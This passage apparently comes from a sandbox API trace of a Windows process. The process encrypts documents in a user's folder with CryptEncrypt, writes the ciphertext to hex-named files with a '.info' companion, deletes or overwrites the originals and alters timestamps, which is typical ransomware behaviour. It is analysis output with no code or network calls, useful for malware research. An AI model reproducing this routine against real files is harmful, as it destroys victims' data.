lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\meFxPWjRmSR9B4.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\meFxPWjRmSR9B4.pptx", lpFilePart=0x0) returned 0x3b [0075.150] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0075.150] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\meFxPWjRmSR9B4.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mefxpwjrmsr9b4.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.150] GetFileType (hFile=0x36c) returned 0x1 [0075.150] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0075.150] GetFileType (hFile=0x36c) returned 0x1 [0075.150] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5db78) returned 1 [0075.150] CloseHandle (hObject=0x36c) returned 1 [0075.151] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\meFxPWjRmSR9B4.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\meFxPWjRmSR9B4.pptx", lpFilePart=0x0) returned 0x3b [0075.151] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\meFxPWjRmSR9B4.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mefxpwjrmsr9b4.pptx")) returned 1 [0075.152] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\meFxPWjRmSR9B4.pptx", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\meFxPWjRmSR9B4.pptx", lpFilePart=0x0) returned 0x3b [0075.152] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\EA64999640B7281BB70298D9B8D2430C", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\EA64999640B7281BB70298D9B8D2430C", lpFilePart=0x0) returned 0x48 [0075.152] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0075.152] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\EA64999640B7281BB70298D9B8D2430C" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ea64999640b7281bb70298d9b8d2430c"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.152] GetFileType (hFile=0x36c) returned 0x1 [0075.152] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0075.152] GetFileType (hFile=0x36c) returned 0x1 [0075.152] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5dc18, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0075.153] CloseHandle (hObject=0x36c) returned 1 [0075.153] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\EA64999640B7281BB70298D9B8D2430C", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\EA64999640B7281BB70298D9B8D2430C", lpFilePart=0x0) returned 0x48 [0075.153] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0075.153] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\EA64999640B7281BB70298D9B8D2430C" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ea64999640b7281bb70298d9b8d2430c"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.153] GetFileType (hFile=0x36c) returned 0x1 [0075.153] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0075.153] GetFileType (hFile=0x36c) returned 0x1 [0075.153] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5dc18, lpLastWriteTime=0x0) returned 1 [0075.153] CloseHandle (hObject=0x36c) returned 1 [0075.153] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\EA64999640B7281BB70298D9B8D2430C", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\EA64999640B7281BB70298D9B8D2430C", lpFilePart=0x0) returned 0x48 [0075.153] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0075.153] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\EA64999640B7281BB70298D9B8D2430C" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ea64999640b7281bb70298d9b8d2430c"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.153] GetFileType (hFile=0x36c) returned 0x1 [0075.153] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0075.153] GetFileType (hFile=0x36c) returned 0x1 [0075.153] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5dc18) returned 1 [0075.154] CloseHandle (hObject=0x36c) returned 1 [0075.154] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\n7YNyCb 6B.odt", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\n7YNyCb 6B.odt", lpFilePart=0x0) returned 0x36 [0075.154] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\n7YNyCb 6B.odt", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\n7YNyCb 6B.odt", lpFilePart=0x0) returned 0x36 [0075.155] CryptImportKey (in: hProv=0x1a5b8010, pbData=0x213d7a8, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5da20 | out: phKey=0x1bf5da20*=0x4ce9f0) returned 1 [0075.155] CryptContextAddRef (hProv=0x1a5b8010, pdwReserved=0x0, dwFlags=0x0) returned 1 [0075.155] CryptExportKey (in: hKey=0x4ce9f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x0, pdwDataLen=0x1bf5db30 | out: pbData=0x0*, pdwDataLen=0x1bf5db30*=0x1c) returned 1 [0075.155] CryptExportKey (in: hKey=0x4ce9f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x213d898, pdwDataLen=0x1bf5db30 | out: pbData=0x213d898*, pdwDataLen=0x1bf5db30*=0x1c) returned 1 [0075.155] CryptImportKey (in: hProv=0x1a5b8010, pbData=0x213d9b8, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5d9f0 | out: phKey=0x1bf5d9f0*=0x1a626b40) returned 1 [0075.155] CryptContextAddRef (hProv=0x1a5b8010, pdwReserved=0x0, dwFlags=0x0) returned 1 [0075.155] CryptContextAddRef (hProv=0x1a5b8010, pdwReserved=0x0, dwFlags=0x0) returned 1 [0075.155] CryptDuplicateKey (in: hKey=0x1a626b40, pdwReserved=0x0, dwFlags=0x0, phKey=0x1bf5d9e0 | out: phKey=0x1bf5d9e0*=0x1a626d70) returned 1 [0075.155] CryptContextAddRef (hProv=0x1a5b8010, pdwReserved=0x0, dwFlags=0x0) returned 1 [0075.155] CryptSetKeyParam (hKey=0x1a626d70, dwParam=0x4, pbData=0x213db00*=0x1, dwFlags=0x0) returned 1 [0075.155] CryptSetKeyParam (hKey=0x1a626d70, dwParam=0x1, pbData=0x213dab0, dwFlags=0x0) returned 1 [0075.155] CryptDestroyKey (hKey=0x1a626b40) returned 1 [0075.155] CryptReleaseContext (hProv=0x1a5b8010, dwFlags=0x0) returned 1 [0075.155] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\n7YNyCb 6B.odt", nBufferLength=0x105, lpBuffer=0x1bf5d450, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\n7YNyCb 6B.odt", lpFilePart=0x0) returned 0x36 [0075.156] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d930) returned 1 [0075.156] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\n7YNyCb 6B.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\n7ynycb 6b.odt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.156] GetFileType (hFile=0x36c) returned 0x1 [0075.156] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8a0) returned 1 [0075.156] GetFileType (hFile=0x36c) returned 0x1 [0075.156] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5DC8140939C1716CD9057578CFA7BC25", nBufferLength=0x105, lpBuffer=0x1bf5d450, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5DC8140939C1716CD9057578CFA7BC25", lpFilePart=0x0) returned 0x48 [0075.156] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d930) returned 1 [0075.156] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5DC8140939C1716CD9057578CFA7BC25" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5dc8140939c1716cd9057578cfa7bc25"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x358 [0075.243] GetFileType (hFile=0x358) returned 0x1 [0075.243] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8a0) returned 1 [0075.243] GetFileType (hFile=0x358) returned 0x1 [0075.243] ReadFile (in: hFile=0x36c, lpBuffer=0x213deb0, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5da28, lpOverlapped=0x0 | out: lpBuffer=0x213deb0*, lpNumberOfBytesRead=0x1bf5da28*=0x14000, lpOverlapped=0x0) returned 1 [0075.245] CryptEncrypt (in: hKey=0x1a626d70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2151ec8*, pdwDataLen=0x1bf5da80*=0x14000, dwBufLen=0x14000 | out: pbData=0x2151ec8*, pdwDataLen=0x1bf5da80*=0x14000) returned 1 [0075.245] WriteFile (in: hFile=0x358, lpBuffer=0x2151ec8*, nNumberOfBytesToWrite=0x14000, lpNumberOfBytesWritten=0x1bf5da18, lpOverlapped=0x0 | out: lpBuffer=0x2151ec8*, lpNumberOfBytesWritten=0x1bf5da18*=0x14000, lpOverlapped=0x0) returned 1 [0075.247] ReadFile (in: hFile=0x36c, lpBuffer=0x213deb0, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5da28, lpOverlapped=0x0 | out: lpBuffer=0x213deb0*, lpNumberOfBytesRead=0x1bf5da28*=0x1f21, lpOverlapped=0x0) returned 1 [0075.247] CryptEncrypt (in: hKey=0x1a626d70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2165f08*, pdwDataLen=0x1bf5da80*=0x1f20, dwBufLen=0x1f20 | out: pbData=0x2165f08*, pdwDataLen=0x1bf5da80*=0x1f20) returned 1 [0075.248] WriteFile (in: hFile=0x358, lpBuffer=0x2165f08*, nNumberOfBytesToWrite=0x1f20, lpNumberOfBytesWritten=0x1bf5da18, lpOverlapped=0x0 | out: lpBuffer=0x2165f08*, lpNumberOfBytesWritten=0x1bf5da18*=0x1f20, lpOverlapped=0x0) returned 1 [0075.248] ReadFile (in: hFile=0x36c, lpBuffer=0x213deb0, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5da28, lpOverlapped=0x0 | out: lpBuffer=0x213deb0*, lpNumberOfBytesRead=0x1bf5da28*=0x0, lpOverlapped=0x0) returned 1 [0075.248] CryptEncrypt (in: hKey=0x1a626d70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2167e68*, pdwDataLen=0x1bf5d9c0*=0x10, dwBufLen=0x10 | out: pbData=0x2167e68*, pdwDataLen=0x1bf5d9c0*=0x10) returned 1 [0075.248] CryptEncrypt (in: hKey=0x1a626d70, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2167eb8*, pdwDataLen=0x1bf5d9c0*=0x0, dwBufLen=0x10 | out: pbData=0x2167eb8*, pdwDataLen=0x1bf5d9c0*=0x10) returned 1 [0075.248] WriteFile (in: hFile=0x358, lpBuffer=0x2167f08*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x1bf5d948, lpOverlapped=0x0 | out: lpBuffer=0x2167f08*, lpNumberOfBytesWritten=0x1bf5d948*=0x10, lpOverlapped=0x0) returned 1 [0075.248] CloseHandle (hObject=0x358) returned 1 [0075.250] CloseHandle (hObject=0x36c) returned 1 [0075.250] CryptDestroyKey (hKey=0x4ce9f0) returned 1 [0075.250] CryptReleaseContext (hProv=0x1a5b8010, dwFlags=0x0) returned 1 [0075.250] CryptReleaseContext (hProv=0x1a5b8010, dwFlags=0x0) returned 1 [0075.250] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5DC8140939C1716CD9057578CFA7BC25", nBufferLength=0x105, lpBuffer=0x1bf5d480, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5DC8140939C1716CD9057578CFA7BC25", lpFilePart=0x0) returned 0x48 [0075.250] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d960) returned 1 [0075.250] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5DC8140939C1716CD9057578CFA7BC25" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5dc8140939c1716cd9057578cfa7bc25"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.250] GetFileType (hFile=0x36c) returned 0x1 [0075.250] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8d0) returned 1 [0075.250] GetFileType (hFile=0x36c) returned 0x1 [0075.250] ReadFile (in: hFile=0x36c, lpBuffer=0x2169600, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2169600*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.251] ReadFile (in: hFile=0x36c, lpBuffer=0x2169600, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2169600*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.253] ReadFile (in: hFile=0x36c, lpBuffer=0x2169600, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2169600*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.254] ReadFile (in: hFile=0x36c, lpBuffer=0x2169600, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2169600*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.255] ReadFile (in: hFile=0x36c, lpBuffer=0x2169600, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2169600*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.255] ReadFile (in: hFile=0x36c, lpBuffer=0x2169600, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2169600*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.255] ReadFile (in: hFile=0x36c, lpBuffer=0x2169600, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2169600*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.255] ReadFile (in: hFile=0x36c, lpBuffer=0x2169600, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2169600*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.255] ReadFile (in: hFile=0x36c, lpBuffer=0x2169600, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2169600*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.255] ReadFile (in: hFile=0x36c, lpBuffer=0x2169600, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2169600*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.255] ReadFile (in: hFile=0x36c, lpBuffer=0x2169600, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2169600*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.255] ReadFile (in: hFile=0x36c, lpBuffer=0x2169600, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2169600*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.256] ReadFile (in: hFile=0x36c, lpBuffer=0x2169600, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2169600*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.256] ReadFile (in: hFile=0x36c, lpBuffer=0x2169600, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2169600*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.256] ReadFile (in: hFile=0x36c, lpBuffer=0x2169600, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2169600*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.256] ReadFile (in: hFile=0x36c, lpBuffer=0x2169600, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2169600*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.256] ReadFile (in: hFile=0x36c, lpBuffer=0x2169600, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2169600*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.256] ReadFile (in: hFile=0x36c, lpBuffer=0x2169600, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2169600*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.256] ReadFile (in: hFile=0x36c, lpBuffer=0x2169600, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2169600*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.256] ReadFile (in: hFile=0x36c, lpBuffer=0x2169600, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2169600*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.257] ReadFile (in: hFile=0x36c, lpBuffer=0x2169600, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2169600*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0075.257] ReadFile (in: hFile=0x36c, lpBuffer=0x2169600, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2169600*, lpNumberOfBytesRead=0x1bf5da48*=0xf30, lpOverlapped=0x0) returned 1 [0075.257] ReadFile (in: hFile=0x36c, lpBuffer=0x2169600, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2169600*, lpNumberOfBytesRead=0x1bf5da48*=0x0, lpOverlapped=0x0) returned 1 [0075.257] CloseHandle (hObject=0x36c) returned 1 [0075.258] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5DC8140939C1716CD9057578CFA7BC25.info", nBufferLength=0x105, lpBuffer=0x1bf5d200, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5DC8140939C1716CD9057578CFA7BC25.info", lpFilePart=0x0) returned 0x4d [0075.258] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d6e0) returned 1 [0075.259] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5DC8140939C1716CD9057578CFA7BC25.info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5dc8140939c1716cd9057578cfa7bc25.info"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.259] GetFileType (hFile=0x36c) returned 0x1 [0075.259] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d650) returned 1 [0075.259] GetFileType (hFile=0x36c) returned 0x1 [0075.259] WriteFile (in: hFile=0x36c, lpBuffer=0x21761b8*, nNumberOfBytesToWrite=0x77d, lpNumberOfBytesWritten=0x1bf5d7b8, lpOverlapped=0x0 | out: lpBuffer=0x21761b8*, lpNumberOfBytesWritten=0x1bf5d7b8*=0x77d, lpOverlapped=0x0) returned 1 [0075.260] CloseHandle (hObject=0x36c) returned 1 [0075.261] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\n7YNyCb 6B.odt", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\n7YNyCb 6B.odt", lpFilePart=0x0) returned 0x36 [0075.261] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5da70) returned 1 [0075.261] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\n7YNyCb 6B.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\n7ynycb 6b.odt"), fInfoLevelId=0x0, lpFileInformation=0x1bf5db50 | out: lpFileInformation=0x1bf5db50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8aad0ea0, ftCreationTime.dwHighDateTime=0x1d4ca87, ftLastAccessTime.dwLowDateTime=0x31274250, ftLastAccessTime.dwHighDateTime=0x1d4ca83, ftLastWriteTime.dwLowDateTime=0x31274250, ftLastWriteTime.dwHighDateTime=0x1d4ca83, nFileSizeHigh=0x0, nFileSizeLow=0x15f21)) returned 1 [0075.261] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da30) returned 1 [0075.261] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\n7YNyCb 6B.odt", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\n7YNyCb 6B.odt", lpFilePart=0x0) returned 0x36 [0075.261] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\n7YNyCb 6B.odt", dwFileAttributes=0x80) returned 1 [0075.262] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\n7YNyCb 6B.odt", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\n7YNyCb 6B.odt", lpFilePart=0x0) returned 0x36 [0075.262] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5dab0) returned 1 [0075.262] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\n7YNyCb 6B.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\n7ynycb 6b.odt"), fInfoLevelId=0x0, lpFileInformation=0x217de18 | out: lpFileInformation=0x217de18*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x8aad0ea0, ftCreationTime.dwHighDateTime=0x1d4ca87, ftLastAccessTime.dwLowDateTime=0x31274250, ftLastAccessTime.dwHighDateTime=0x1d4ca83, ftLastWriteTime.dwLowDateTime=0x31274250, ftLastWriteTime.dwHighDateTime=0x1d4ca83, nFileSizeHigh=0x0, nFileSizeLow=0x15f21)) returned 1 [0075.262] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da70) returned 1 [0075.262] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\n7YNyCb 6B.odt", nBufferLength=0x105, lpBuffer=0x1bf5d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\n7YNyCb 6B.odt", lpFilePart=0x0) returned 0x36 [0075.262] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9a0) returned 1 [0075.262] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\n7YNyCb 6B.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\n7ynycb 6b.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0075.262] GetFileType (hFile=0x36c) returned 0x1 [0075.262] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d910) returned 1 [0075.262] GetFileType (hFile=0x36c) returned 0x1 [0075.262] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0075.263] WriteFile (in: hFile=0x36c, lpBuffer=0x217e2a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x217e2a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.264] WriteFile (in: hFile=0x36c, lpBuffer=0x217e2a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x217e2a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.264] WriteFile (in: hFile=0x36c, lpBuffer=0x217e2a0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x217e2a0*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0075.265] WriteFile (in: hFile=0x36c, lpBuffer=0x217e2a0*, 